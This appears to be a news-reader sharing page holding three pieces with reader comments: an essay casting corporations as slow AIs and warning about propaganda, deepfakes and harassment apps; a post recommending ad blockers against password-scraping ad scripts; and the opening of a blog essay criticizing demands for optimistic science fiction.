If it walks like a duck and quacks like a duck, it's probably a duck. And if it looks like a religion it's probably a religion. I don't see much evidence for human-like, self-directed artificial intelligences coming along any time now, and a fair bit of evidence that nobody except some freaks in university cognitive science departments even want it. What we're getting, instead, is self-optimizing tools that defy human comprehension but are not, in fact, any more like our kind of intelligence than a Boeing 737 is like a seagull. So I'm going to wash my hands of the singularity as an explanatory model without further ado—I'm one of those vehement atheists too—and try and come up with a better model for what's happening to us.

Towards a better model for the future

As my fellow SF author Ken MacLeod likes to say, the secret weapon of science fiction is history. History, loosely speaking, is the written record of what and how people did things in past times—times that have slipped out of our personal memories. We science fiction writers tend to treat history as a giant toy chest to raid whenever we feel like telling a story. With a little bit of history it's really easy to whip up an entertaining yarn about a galactic empire that mirrors the development and decline of the Hapsburg Empire, or to re-spin the October Revolution as a tale of how Mars got its independence.

But history is useful for so much more than that.

It turns out that our personal memories don't span very much time at all. I'm 53, and I barely remember the 1960s. I only remember the 1970s with the eyes of a 6-16 year old. My father, who died last year aged 93, just about remembered the 1930s. Only those of my father's generation are able to directly remember the great depression and compare it to the 2007/08 global financial crisis directly. But westerners tend to pay little attention to cautionary tales told by ninety-somethings. We modern, change-obsessed humans tend to repeat our biggest social mistakes when they slip out of living memory, which means they recur on a time scale of seventy to a hundred years.

So if our personal memories are usless, it's time for us to look for a better cognitive toolkit.

History gives us the perspective to see what went wrong in the past, and to look for patterns, and check whether those patterns apply to the present and near future. And looking in particular at the history of the past 200-400 years—the age of increasingly rapid change—one glaringly obvious deviation from the norm of the preceding three thousand centuries—is the development of Artificial Intelligence, which happened no earlier than 1553 and no later than 1844.

I'm talking about the very old, very slow AIs we call corporations, of course. What lessons from the history of the company can we draw that tell us about the likely behaviour of the type of artificial intelligence we are all interested in today?

Old, slow AI

Let me crib from Wikipedia for a moment:

In the late 18th century, Stewart Kyd, the author of the first treatise on corporate law in English, defined a corporation as:

a collection of many individuals united into one body, under a special denomination, having perpetual succession under an artificial form, and vested, by policy of the law, with the capacity of acting, in several respects, as an individual, particularly of taking and granting property, of contracting obligations, and of suing and being sued, of enjoying privileges and immunities in common, and of exercising a variety of political rights, more or less extensive, according to the design of its institution, or the powers conferred upon it, either at the time of its creation, or at any subsequent period of its existence.

—A Treatise on the Law of Corporations, Stewart Kyd (1793-1794)

In 1844, the British government passed the Joint Stock Companies Act, which created a register of companies and allowed any legal person, for a fee, to register a company, which existed as a separate legal person. Subsequently, the law was extended to limit the liability of individual shareholders in event of business failure, and both Germany and the United States added their own unique extensions to what we see today as the doctrine of corporate personhood.

(Of course, there were plenty of other things happening between the sixteenth and twenty-first centuries that changed the shape of the world we live in. I've skipped changes in agricultural productivity due to energy economics, which finally broke the Malthusian trap our predecessors lived in. This in turn broke the long term cap on economic growth of around 0.1% per year in the absence of famine, plagues, and wars depopulating territories and making way for colonial invaders. I've skipped the germ theory of diseases, and the development of trade empires in the age of sail and gunpowder that were made possible by advances in accurate time-measurement. I've skipped the rise and—hopefully—decline of the pernicious theory of scientific racism that underpinned western colonialism and the slave trade. I've skipped the rise of feminism, the ideological position that women are human beings rather than property, and the decline of patriarchy. I've skipped the whole of the Enlightenment and the age of revolutions! But this is a technocentric congress, so I want to frame this talk in terms of AI, which we all like to think we understand.)

Here's the thing about corporations: they're clearly artificial, but legally they're people. They have goals, and operate in pursuit of these goals. And they have a natural life cycle. In the 1950s, a typical US corporation on the S&P 500 index had a lifespan of 60 years, but today it's down to less than 20 years.

Corporations are cannibals; they consume one another. They are also hive superorganisms, like bees or ants. For their first century and a half they relied entirely on human employees for their internal operation, although they are automating their business processes increasingly rapidly this century. Each human is only retained so long as they can perform their assigned tasks, and can be replaced with another human, much as the cells in our own bodies are functionally interchangeable (and a group of cells can, in extremis, often be replaced by a prosthesis). To some extent corporations can be trained to service the personal desires of their chief executives, but even CEOs can be dispensed with if their activities damage the corporation, as Harvey Weinstein found out a couple of months ago.

Finally, our legal environment today has been tailored for the convenience of corporate persons, rather than human persons, to the point where our governments now mimic corporations in many of their internal structures.

What do AIs want?

What do our current, actually-existing AI overlords want?

Elon Musk—who I believe you have all heard of—has an obsessive fear of one particular hazard of artificial intelligence—which he conceives of as being a piece of software that functions like a brain-in-a-box)—namely, the paperclip maximizer. A paperclip maximizer is a term of art for a goal-seeking AI that has a single priority, for example maximizing the number of paperclips in the universe. The paperclip maximizer is able to improve itself in pursuit of that goal but has no ability to vary its goal, so it will ultimately attempt to convert all the metallic elements in the solar system into paperclips, even if this is obviously detrimental to the wellbeing of the humans who designed it.

Unfortunately, Musk isn't paying enough attention. Consider his own companies. Tesla is a battery maximizer—an electric car is a battery with wheels and seats. SpaceX is an orbital payload maximizer, driving down the cost of space launches in order to encourage more sales for the service it provides. Solar City is a photovoltaic panel maximizer. And so on. All three of Musk's very own slow AIs are based on an architecture that is designed to maximize return on shareholder investment, even if by doing so they cook the planet the shareholders have to live on. (But if you're Elon Musk, that's okay: you plan to retire on Mars.)

The problem with corporations is that despite their overt goals—whether they make electric vehicles or beer or sell life insurance policies—they are all subject to instrumental convergence insofar as they all have a common implicit paperclip-maximizer goal: to generate revenue. If they don't make money, they are eaten by a bigger predator or they go bust. Making money is an instrumental goal—it's as vital to them as breathing is for us mammals, and without pursuing it they will fail to achieve their final goal, whatever it may be. Corporations generally pursue their instrumental goals—notably maximizing revenue—as a side-effect of the pursuit of their overt goal. But sometimes they try instead to manipulate the regulatory environment they operate in, to ensure that money flows towards them regardless.

Human tool-making culture has become increasingly complicated over time. New technologies always come with an implicit political agenda that seeks to extend its use, governments react by legislating to control the technologies, and sometimes we end up with industries indulging in legal duels.

For example, consider the automobile. You can't have mass automobile transport without gas stations and fuel distribution pipelines. These in turn require access to whoever owns the land the oil is extracted from—and before you know it, you end up with a permanent occupation force in Iraq and a client dictatorship in Saudi Arabia. Closer to home, automobiles imply jaywalking laws and drink-driving laws. They affect town planning regulations and encourage suburban sprawl, the construction of human infrastructure on the scale required by automobiles, not pedestrians. This in turn is bad for competing transport technologies like buses or trams (which work best in cities with a high population density).

To get these laws in place, providing an environment conducive to doing business, corporations spend money on political lobbyists—and, when they can get away with it, on bribes. Bribery need not be blatant, of course. For example, the reforms of the British railway network in the 1960s dismembered many branch services and coincided with a surge in road building and automobile sales. These reforms were orchestrated by Transport Minister Ernest Marples, who was purely a politician. However, Marples accumulated a considerable personal fortune during this time by owning shares in a motorway construction corporation. (So, no conflict of interest there!)

The automobile industry in isolation isn't a pure paperclip maximizer. But if you look at it in conjunction with the fossil fuel industries, the road-construction industry, the accident insurance industry, and so on, you begin to see the outline of a paperclip maximizing ecosystem that invades far-flung lands and grinds up and kills around one and a quarter million people per year—that's the global death toll from automobile accidents according to the world health organization: it rivals the first world war on an ongoing basis—as side-effects of its drive to sell you a new car.

Automobiles are not, of course, a total liability. Today's cars are regulated stringently for safety and, in theory, to reduce toxic emissions: they're fast, efficient, and comfortable. We can thank legally mandated regulations for this, of course. Go back to the 1970s and cars didn't have crumple zones. Go back to the 1950s and cars didn't come with seat belts as standard. In the 1930s, indicators—turn signals—and brakes on all four wheels were optional, and your best hope of surviving a 50km/h crash was to be thrown clear of the car and land somewhere without breaking your neck. Regulatory agencies are our current political systems' tool of choice for preventing paperclip maximizers from running amok. But unfortunately they don't always work.

One failure mode that you should be aware of is regulatory capture, where regulatory bodies are captured by the industries they control. Ajit Pai, head of the American Federal Communications Commission who just voted to eliminate net neutrality rules, has worked as Associate General Counsel for Verizon Communications Inc, the largest current descendant of the Bell telephone system monopoly. Why should someone with a transparent interest in a technology corporation end up in charge of a regulator for the industry that corporation operates within? Well, if you're going to regulate a highly complex technology, you need to recruit your regulators from among those people who understand it. And unfortunately most of those people are industry insiders. Ajit Pai is clearly very much aware of how Verizon is regulated, and wants to do something about it—just not necessarily in the public interest. When regulators end up staffed by people drawn from the industries they are supposed to control, they frequently end up working with their former officemates to make it easier to turn a profit, either by raising barriers to keep new insurgent companies out, or by dismantling safeguards that protect the public.

Another failure mode is regulatory lag, when a technology advances so rapidly that regulations are laughably obsolete by the time they're issued. Consider the EU directive requiring cookie notices on websites, to caution users that their activities were tracked and their privacy might be violated. This would have been a good idea, had it shown up in 1993 or 1996, but unfortunately it didn't show up until 2011, by which time the web was vastly more complex. Fingerprinting and tracking mechanisms that had nothing to do with cookies were already widespread by then. Tim Berners-Lee observed in 1995 that five years' worth of change was happening on the web for every twelve months of real-world time; by that yardstick, the cookie law came out nearly a century too late to do any good.

Again, look at Uber. This month the European Court of Justice ruled that Uber is a taxi service, not just a web app. This is arguably correct; the problem is, Uber has spread globally since it was founded eight years ago, subsidizing its drivers to put competing private hire firms out of business. Whether this is a net good for society is arguable; the problem is, a taxi driver can get awfully hungry if she has to wait eight years for a court ruling against a predator intent on disrupting her life.

So, to recap: firstly, we already have paperclip maximizers (and Musk's AI alarmism is curiously mirror-blind). Secondly, we have mechanisms for keeping them in check, but they don't work well against AIs that deploy the dark arts—especially corruption and bribery—and they're even worse againt true AIs that evolve too fast for human-mediated mechanisms like the Law to keep up with. Finally, unlike the naive vision of a paperclip maximizer, existing AIs have multiple agendas—their overt goal, but also profit-seeking, and expansion into new areas, and to accomodate the desires of whoever is currently in the driver's seat.

How it all went wrong

It seems to me that our current political upheavals are best understood as arising from the capture of post-1917 democratic institutions by large-scale AIs. Everywhere I look I see voters protesting angrily against an entrenched establishment that seems determined to ignore the wants and needs of their human voters in favour of the machines. The Brexit upset was largely the result of a protest vote against the British political establishment; the election of Donald Trump likewise, with a side-order of racism on top. Our major political parties are led by people who are compatible with the system as it exists—a system that has been shaped over decades by corporations distorting our government and regulatory environments. We humans are living in a world shaped by the desires and needs of AIs, forced to live on their terms, and we are taught that we are valuable only insofar as we contribute to the rule of the machines.

Now, this is CCC, and we're all more interested in computers and communications technology than this historical crap. But as I said earlier, history is a secret weapon if you know how to use it. What history is good for is enabling us to spot recurring patterns in human behaviour that repeat across time scales outside our personal experience—decades or centuries apart. If we look at our historical very slow AIs, what lessons can we learn from them about modern AI—the flash flood of unprecedented deep learning and big data technologies that have overtaken us in the past decade?

We made a fundamentally flawed, terrible design decision back in 1995, that has damaged democratic political processes, crippled our ability to truly understand the world around us, and led to the angry upheavals of the present decade. That mistake was to fund the build-out of the public world wide web—as opposed to the earlier, government-funded corporate and academic internet—by monetizing eyeballs via advertising revenue.

(Note: Cory Doctorow has a contrarian thesis: The dotcom boom was also an economic bubble because the dotcoms came of age at a tipping point in financial deregulation, the point at which the Reagan-Clinton-Bush reforms that took the Depression-era brakes off financialization were really picking up steam. That meant that the tech industry's heady pace of development was the first testbed for treating corporate growth as the greatest virtue, built on the lie of the fiduciary duty to increase profit above all other considerations. I think he's entirely right about this, but it's a bit of a chicken-and-egg argument: we wouldn't have had a commercial web in the first place without a permissive, deregulated financial environment. My memory of working in the dot-com 1.0 bubble is that, outside of a couple of specific environments (the Silicon Valley area and the Boston-Cambridge corridor) venture capital was hard to find until late 1998 or thereabouts: the bubble's initial inflation was demand-driven rather than capital-driven, as the non-tech investment sector was late to the party. Caveat: I didn't win the lottery, so what do I know?)

The ad-supported web that we live with today wasn't inevitable. If you recall the web as it was in 1994, there were very few ads at all, and not much in the way of commerce. (What ads there were were mostly spam, on usenet and via email.) 1995 was the year the world wide web really came to public attention in the anglophone world and consumer-facing websites began to appear. Nobody really knew how this thing was going to be paid for (the original dot com bubble was all largely about working out how to monetize the web for the first time, and a lot of people lost their shirts in the process). And the naive initial assumption was that the transaction cost of setting up a TCP/IP connection over modem was too high to be supported by per-use microbilling, so we would bill customers indirectly, by shoving advertising banners in front of their eyes and hoping they'd click through and buy something.

Unfortunately, advertising is an industry. Which is to say, it's the product of one of those old-fashioned very slow AIs I've been talking about. Advertising tries to maximize its hold on the attention of the minds behind each human eyeball: the coupling of advertising with web search was an inevitable outgrowth. (How better to attract the attention of reluctant subjects than to find out what they're really interested in seeing, and sell ads that relate to those interests?)

The problem with applying the paperclip maximizer approach to monopolizing eyeballs, however, is that eyeballs are a scarce resource. There are only 168 hours in every week in which I can gaze at banner ads. Moreover, most ads are irrelevant to my interests and it doesn't matter how often you flash an ad for dog biscuits at me, I'm never going to buy any. (I'm a cat person.) To make best revenue-generating use of our eyeballs, it is necessary for the ad industry to learn who we are and what interests us, and to target us increasingly minutely in hope of hooking us with stuff we're attracted to.

At this point in a talk I'd usually go into an impassioned rant about the hideous corruption and evil of Facebook, but I'm guessing you've heard it all before so I won't bother. The too-long-didn't-read summary is, Facebook is as much a search engine as Google or Amazon. Facebook searches are optimized for Faces, that is, for human beings. If you want to find someone you fell out of touch with thirty years ago, Facebook probably knows where they live, what their favourite colour is, what size shoes they wear, and what they said about you to your friends all those years ago that made you cut them off.

Even if you don't have a Facebook account, Facebook has a You account—a hole in their social graph with a bunch of connections pointing into it and your name tagged on your friends' photographs. They know a lot about you, and they sell access to their social graph to advertisers who then target you, even if you don't think you use Facebook. Indeed, there's barely any point in not using Facebook these days: they're the social media Borg, resistance is futile.

However, Facebook is trying to get eyeballs on ads, as is Twitter, as is Google. To do this, they fine-tune the content they show you to make it more attractive to your eyes—and by 'attractive' I do not mean pleasant. We humans have an evolved automatic reflex to pay attention to threats and horrors as well as pleasurable stimuli: consider the way highway traffic always slows to a crawl as it is funnelled past an accident site. The algorithms that determine what to show us when we look at Facebook or Twitter take this bias into account. You might react more strongly to a public hanging in Iran than to a couple kissing: the algorithm knows, and will show you whatever makes you pay attention.

This brings me to another interesting point about computerized AI, as opposed to corporatized AI: AI algorithms tend to embody the prejudices and beliefs of the programmers. A couple of years ago I ran across an account of a webcam developed by mostly-pale-skinned silicon valley engineers that have difficulty focusing or achieving correct colour balance when pointing at dark-skinned faces. That's an example of human-programmer-induced bias. But with today's deep learning, bias can creep in via the data sets the neural networks are trained on. Microsoft's first foray into a conversational chatbot driven by machine learning, Tay, was yanked offline within days because when 4chan and Reddit based trolls discovered they could train it towards racism and sexism for shits and giggles.

Humans may be biased, but at least we're accountable and if someone gives you racist or sexist abuse to your face you can complain (or punch them). But it's impossible to punch a corporation, and it may not even be possible to identify the source of unfair bias when you're dealing with a machine learning system.

AI-based systems that concretize existing prejudices and social outlooks make it harder for activists like us to achieve social change. Traditional advertising works by playing on the target customer's insecurity and fear as much as on their aspirations, which in turn play on the target's relationship with their surrounding cultural matrix. Fear of loss of social status and privilege is a powerful stimulus, and fear and xenophobia are useful tools for attracting eyeballs.

What happens when we get pervasive social networks with learned biases against, say, feminism or Islam or melanin? Or deep learning systems trained on data sets contaminated by racist dipshits? Deep learning systems like the ones inside Facebook that determine which stories to show you to get you to pay as much attention as possible to the adverts?

I think you already know the answer to that.

Look to the future (it's bleak!)

Now, if this is sounding a bit bleak and unpleasant, you'd be right. I write sci-fi, you read or watch or play sci-fi; we're acculturated to think of science and technology as good things, that make our lives better.

But plenty of technologies have, historically, been heavily regulated or even criminalized for good reason, and once you get past the reflexive indignation at any criticism of technology and progress, you might agree that it is reasonable to ban individuals from owning nuclear weapons or nerve gas. Less obviously: they may not be weapons, but we've banned chlorofluorocarbon refrigerants because they were building up in the high stratosphere and destroying the ozone layer that protects us from UV-B radiation. And we banned tetraethyl lead additive in gasoline, because it poisoned people and led to a crime wave.

Nerve gas and leaded gasoline were 1930s technologies, promoted by 1930s corporations. Halogenated refrigerants and nuclear weapons are totally 1940s, and intercontinental ballistic missiles date to the 1950s. I submit that the 21st century is throwing up dangerous new technologies—just as our existing strategies for regulating very slow AIs have broken down.

Let me give you four examples—of new types of AI applications—that are going to warp our societies even worse than the old slow AIs of yore have done. This isn't an exhaustive list: these are just examples. We need to work out a general strategy for getting on top of this sort of AI before they get on top of us.

(Note that I do not have a solution to the regulatory problems I highlighted earlier, in the context of AI. This essay is polemical, intended to highlight the existence of a problem and spark a discussion, rather than a canned solution. After all, if the problem was easy to solve it wouldn't be a problem, would it?)

Firstly, Political hacking tools: social graph-directed propaganda

Topping my list of dangerous technologies that need to be regulated, this is low-hanging fruit after the electoral surprises of 2016. Cambridge Analytica pioneered the use of deep learning by scanning the Facebook and Twitter social graphs to indentify voters' political affiliations. They identified individuals vulnerable to persuasion who lived in electorally sensitive districts, and canvas them with propaganda that targeted their personal hot-button issues. The tools developed by web advertisers to sell products have now been weaponized for political purposes, and the amount of personal information about our affiliations that we expose on social media makes us vulnerable. Aside from the last US presidential election, there's mounting evidence that the British referendum on leaving the EU was subject to foreign cyberwar attack via weaponized social media, as was the most recent French presidential election.

I'm biting my tongue and trying not to take sides here: I have my own political affiliation, after all. But if social media companies don't work out how to identify and flag micro-targeted propaganda then democratic elections will be replaced by victories for whoever can buy the most trolls. And this won't simply be billionaires like the Koch brothers and Robert Mercer in the United States throwing elections to whoever will hand them the biggest tax cuts. Russian military cyberwar doctrine calls for the use of social media to confuse and disable perceived enemies, in addition to the increasingly familiar use of zero-day exploits for espionage via spear phishing and distributed denial of service attacks on infrastructure (which are practiced by western agencies as well). Sooner or later, the use of propaganda bot armies in cyberwar will go global, and at that point, our social discourse will be irreparably poisoned.

(By the way, I really hate the cyber- prefix; it usually indicates that the user has no idea what they're talking about. Unfortunately the term 'cyberwar' seems to have stuck. But I digress.)

Secondly, an adjunct to deep learning targeted propaganda is the use of neural network generated false video media.

We're used to Photoshopped images these days, but faking video and audio is still labour-intensive, right? Unfortunately, that's a nope: we're seeing first generation AI-assisted video porn, in which the faces of film stars are mapped onto those of other people in a video clip using software rather than a laborious human process. (Yes, of course porn is the first application: Rule 34 of the Internet applies.) Meanwhile, we have WaveNet, a system for generating realistic-sounding speech in the voice of a human speaker the neural network has been trained to mimic. This stuff is still geek-intensive and requires relatively expensive GPUs. But in less than a decade it'll be out in the wild, and just about anyone will be able to fake up a realistic-looking video of someone they don't like doing something horrible.

We're already seeing alarm over bizarre YouTube channels that attempt to monetize children's TV brands by scraping the video content off legitimate channels and adding their own advertising and keywords. Many of these channels are shaped by paperclip-maximizer advertising AIs that are simply trying to maximize their search ranking on YouTube. Add neural network driven tools for inserting Character A into Video B to click-maximizing bots and things are going to get very weird (and nasty). And they're only going to get weirder when these tools are deployed for political gain.

We tend to evaluate the inputs from our eyes and ears much less critically than what random strangers on the internet tell us—and we're already too vulnerable to fake news as it is. Soon they'll come for us, armed with believable video evidence. The smart money says that by 2027 you won't be able to believe anything you see in video unless there are cryptographic signatures on it, linking it back to the device that shot the raw feed—and you know how good most people are at using encryption? The dumb money is on total chaos.

Paperclip maximizers that focus on eyeballs are so 20th century. Advertising as an industry can only exist because of a quirk of our nervous system—that we are susceptible to addiction. Be it tobacco, gambling, or heroin, we recognize addictive behaviour when we see it. Or do we? It turns out that the human brain's reward feedback loops are relatively easy to game. Large corporations such as Zynga (Farmville) exist solely because of it; free-to-use social media platforms like Facebook and Twitter are dominant precisely because they are structured to reward frequent interaction and to generate emotional responses (not necessarily positive emotions—anger and hatred are just as good when it comes to directing eyeballs towards advertisers). "Smartphone addiction" is a side-effect of advertising as a revenue model: frequent short bursts of interaction keep us coming back for more.

Thanks to deep learning, neuroscientists have mechanised the process of making apps more addictive. Dopamine Labs is one startup that provides tools to app developers to make any app more addictive, as well as to reduce the desire to continue a behaviour if it's undesirable. It goes a bit beyond automated A/B testing; A/B testing allows developers to plot a binary tree path between options, but true deep learning driven addictiveness maximizers can optimize for multiple attractors simultaneously. Now, Dopamine Labs seem, going by their public face, to have ethical qualms about the misuse of addiction maximizers in software. But neuroscience isn't a secret, and sooner or later some really unscrupulous people will try to see how far they can push it.

Let me give you a more specific scenario.

Apple have put a lot of effort into making realtime face recognition work with the iPhone X. You can't fool an iPhone X with a photo or even a simple mask: it does depth mapping to ensure your eyes are in the right place (and can tell whether they're open or closed) and recognize your face from underlying bone structure through makeup and bruises. It's running continuously, checking pretty much as often as every time you'd hit the home button on a more traditional smartphone UI, and it can see where your eyeballs are pointing. The purpose of this is to make it difficult for a phone thief to get anywhere if they steal your device. but it means your phone can monitor your facial expressions and correlate it against app usage. Your phone will be aware of precisely what you like to look at on its screen. With addiction-seeking deep learning and neural-network generated images, it is in principle possible to feed you an endlessly escallating payload of arousal-maximizing inputs. It might be Facebook or Twitter messages optimized to produce outrage, or it could be porn generated by AI to appeal to kinks you aren't even consciously aware of. But either way, the app now owns your central nervous system—and you will be monetized.

Finally, I'd like to raise a really hair-raising spectre that goes well beyond the use of deep learning and targeted propaganda in cyberwar.

Back in 2011, an obscure Russian software house launched an iPhone app for pickup artists called Girls around Me. (Spoiler: Apple pulled it like a hot potato when word got out.) The app works out where the user is using GPS, then queried FourSquare and Facebook for people matching a simple relational search—for single females (per Facebook) who have checked in (or been checked in by their friends) in your vicinity (via FourSquare). The app then displayed their locations on a map, along with links to their social media profiles.

If they were doing it today the interface would be gamified, showing strike rates and a leaderboard and flagging targets who succumbed to harassment as easy lays. But these days the cool kids and single adults are all using dating apps with a missing vowel in the name: only a creeper would want something like "Girls around Me", right?

Unfortunately there are even nastier uses than scraping social media to find potential victims for serial rapists. Does your social media profile indicate your political or religious affiliation? Nope? Don't worry, Cambridge Analytica can work them out with 99.9% precision just by scanning the tweets and Facebook comments you liked. Add a service that can identify peoples affiliation and location, and you have the beginning of a flash mob app: one that will show you people like Us and people like Them on a hyper-local map.

Imagine you're young, female, and a supermarket has figured out you're pregnant by analysing the pattern of your recent purchases, like Target back in 2012.

Now imagine that all the anti-abortion campaigners in your town have an app called "babies at risk" on their phones. Someone has paid for the analytics feed from the supermarket and the result is that every time you go near a family planning clinic a group of unfriendly anti-abortion protesters engulfs you.

Or imagine you're male and gay, and the "God Hates Fags" crowd has invented a 100% reliable Gaydar app (based on your Grindr profile) and is getting their fellow travellers to queer bash gay men only when they're alone or out-numbered 10:1. (That's the special horror of precise geolocation.) Or imagine you're in Pakistan and Christian/Muslim tensions are mounting, or you're in rural Alabama, or ... the possibilities are endless

Someone out there is working on it: a geolocation-aware social media scraping deep learning application, that uses a gamified, competitive interface to reward its "players" for joining in acts of mob violence against whoever the app developer hates. Probably it has an inoccuous-seeming but highly addictive training mode to get the users accustomed to working in teams and obeying the app's instructions—think Ingress or Pokemon Go. Then, at some pre-planned zero hour, it switches mode and starts rewarding players for violence—players who have been primed to think of their targets as vermin, by a steady drip-feed of micro-targeted dehumanizing propaganda delivered over a period of months.

And the worst bit of this picture?

Is that the app developer isn't a nation-state trying to disrupt its enemies, or an extremist political group trying to murder gays, jews, or muslims; it's just a paperclip maximizer doing what it does—and you are the paper.

Read the whole story
onepointzero
14 days ago
reply
Brussels, Belgium
Share this story
Delete
2 public comments
brennen
13 days ago
reply
This is as bleak as you think it is, but it's worth it for the corporations-are-AIs framing.
Boulder, CO
jepler
14 days ago
reply
"It seems to me that our current political upheavals are best understood as arising from the capture of post-1917 democratic institutions by large-scale AIs." (Read the whole thing is my recommendation)
Earth, Sol system, Western spiral arm

You need an ad blocker

1 Share

Ad networks, marketing services and the websites using their products regularly complain about the prevalence of ad-blocker use among their visitors. Comparing it to theft of services.

If stories of these same outfits regularly abusing their position and aggressively invading users' privacy didn't surface with amazing regularity, they might have a chance to defend their position.

Just this week, The Verge revealed that some ad targeting scripts are pulling data from your browser’s built-in password manager tool:

The researchers examined two different scripts — AdThink and OnAudience — both of are designed to get identifiable information out of browser-based password managers. The scripts work by injecting invisible login forms in the background of the webpage and scooping up whatever the browsers autofill into the available slots. That information can then be used as a persistent ID to track users from page to page, a potentially valuable tool in targeting advertising.

This is way beyond standard "tracking" and well into personal data theft. If you're not already using an external password manager, I suggest you start now. There are plenty of options out there like 1Password, Bitwarden or KeepassX.

Meanwhile, session replay scripts are also grabbing personal information from pages they're installed on. If you don't know what these are (and, unless you work in online marketing, there's little reason to), the linked article describes them accurately:

You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder.

Unlike the deliberately malicious ad targeting scripts mentioned above, the session replay ones attempt to automatically redact sensitive information or require their users to manually do so. This is not enough, and sensitive information can be transmitted and stored by these services:

Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third-party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behavior. The same is true for the collection of user inputs during checkout and registration processes.

If you're not using privacy plugins in your browser, you should start right now. Install an ad blocker, my personal favourite is uBlock Origin. Then install an extra tracker blocking plugin like Disconnect.me or Privacy Badger.

Read the whole story
onepointzero
16 days ago
reply
Brussels, Belgium
Share this story
Delete

Denying Dystopia: The Hope Police in Fact and Fiction

1 Comment

I recently read Terri Favro’s upcoming book on the history and future of robotics, sent to me by a publisher hungry for blurbs. It’s a fun read— I had no trouble obliging them—  but I couldn’t avoid an almost oppressive sense of— well, of optimism hanging over the whole thing. Favro states outright, for example, that she’s decided to love the Internet of Things; those who eye it with suspicion she compares to old fogies who stick with their clunky coal-burning furnace and knob-and-tube wiring as the rest of the world moves into a bright sunny future. She praises algorithms that analyze your behavior and autonomously order retail goods on your behalf, just in case you’re not consuming enough on your own: “We’ll be giving up our privacy, but gaining the surprise and delight that comes with something new always waiting for us at the door” she gushes (sliding past the surprise and delight we’ll feel when our Visa bill loads up with purchases we never made). “How many of us can resist the lure of the new?” She does pay lip service to the potential hackability of this  Internet of Things— concedes that her networked fridge might be compromised, for example—  but goes on to say  “…to do what, exactly? Replace my lactose-free low-fat milk with table cream? Sabotage my diet by substituting chocolate for rapini?”

Maybe, yeah. Or maybe your insurance company might come snooping around in the hopes your eating habits might give them an excuse to reject your claim for medical treatments you might have avoided if you’d “lived more responsibly”. Maybe some botnet will talk your fridge and a million others into cranking up their internal temperatures to 20ºC during the day, then bringing them all back down to a nice innocuous 5º just before you get home from work. (Botulism in just a few percent of those affected could overwhelm hospitals and take out our medical response capacity overnight.) And while Favro at least admits to the danger of Evil Russian Hackers, she never once mentions that our own governments will in all likelihood be rooting around in our fridges and TVs and smart bulbs, cruising the Internet Of Things while whistling that perennial favorite If You Got Nothin’ to Hide You Got Nothin’ to Fear

Nor should we forget that old chestnut from Blue Lives Murder: “I had to shoot him, Your Honor. I feared for my life. It’s true the suspect was unarmed at the time, but he’s well over six feet tall and according to his Samsung Health app he lifted weights and ran 20K three times a week…”

That’s just a few ways your wired appliances can hurt you personally. We haven’t scratched the potential damage to wider targets. What’s to stop them from getting conscripted into an appliance-based botnet like, for example,  the one that took out KrebsOnSecurity last year?

I’m not trying to shit on Favro; as I said, I enjoyed the book. But it did get me thinking about bigger pictures, and this recent demand for brighter prognoses.  These days it seems as if everyone and their dog is demanding we stick our fingers in our ears, squeeze our eyes tight shut, and whistle a happy tune while the mountainside collapses on top of us.

In a sense this is nothing new. Denial is a ubiquitous part of human nature. One of the things science fiction has traditionally done has been get in our faces, hold our eyelids open and force us to look at the road ahead. That’s a big reason I was drawn to the field in the first place.

So how come some of the most strident demands to Lighten the Hell Up are coming from inside science fiction itself?

*

It started slow. Remember back at the beginning of the decade, when the president of Arizona State University told Neal Stephenson that the sorry state of the space program was our fault? Science fiction wasn’t bold and optimistic like it used to be, apparently. It had stopped Dreaming Big. The rocket scientists weren’t inspired because we weren’t being sufficiently inspirational.

Are we saving the world yet?

Are we saving the world yet?

I’ve always found that argument a bit tenuous, but Stephenson took it to heart. Booted up “Project Hieroglyph“, a big shiny movement devoted to chasing dystopia down into the cellar and replacing it with upbeat, optimistic science fiction that could Change The World. The fruit of that labor was Hieroglyph: Stories and Visions for a Better Future; a number of my friends can be found within its pages, although for some reason I was not approached for a contribution. (No problem— I got my shot just this year when Kathryn Cramer, the coeditor of H:SaVfaBF, let me write my own piece of optiskif for the X-Prize’s Seat 14C.)

A few grumbled (Ramez Naam struck back in Slate in defense of dystopias). Others dug in their heels: You don’t need to squint very hard to figure out Michal Solana’s  take-home message in “Stop Writing Dystopian Fiction – It’s Making Us All Fear Technology“. That appeared in Wired back in 2014, but the bandwagon rolls on still. Just this year, writing in Clarkesworld, my dear friend Kelly Robson put her foot down: “No more dystopias [italics hers]. What we need is near- and mid-future stories that show an array of trajectories out of the gloomy toilet bowl we’re spiraling.”

There’s something telling about that edict, insofar as it explicitly admits that yes, we are indeed circling the drain. We’re all on that same page, at least. But what the hope police[1] seem to be converging on is, You don’t get to give us bad news unless you can also tell us how to make it good. Don’t you dare deliver a diagnosis of cancer unless you’ve got a cure stashed up your sleeve, because otherwise you’re just being a downer.

Looks like dangerous seas up ahead. I know! Let’s erase all the reefs from our nautical charts![2]

*

Inherent in this attitude is the belief that science fiction matters, that it can influence the trajectory of real life, that We Have The Power To Change the Future and With Great Power Goes Great Responsibility— so if we serve up an unending diet of crushing dystopias people will lose all hope, melt into whimpering puddles of flop sweat, and grow too paralyzed to fix anything. Because the World takes us so very seriously. Because if we do not tell tales of hope, then we have no one to blame but ourselves when the ceiling crashes in.

I’ve always been a bit gobsmacked by the arrogance of that view.

I’m not saying that SF has never proven inspirational in real life. NASA is infested with scientists and engineers who were weaned on Star Trek. Gibson informed the future as much as he imagined it. Hell, we wouldn’t have the glorious legacy of Reagan’s Strategic Defense Initiative if a bunch of Real SF Writers hadn’t snuck into the White House and inspired the Gipper with hi-tech tales of space-based missile shields and ion cannons. I’m not denying any of that.

What I’m saying is that none of those things inspired people to change. It merely justified their inclination to keep on doing what they’d always wanted to. Science fiction is like the Bible that way: it’s big enough, and messy enough, to let you cherry-pick “inspiration” for pretty much any paradigm that turns your crank. Hell, you can even use SF to justify a society based on incest (check out the works of Theodore Sturgeon if you don’t believe me). That’s one of the reasons I like the genre; you can go anywhere.

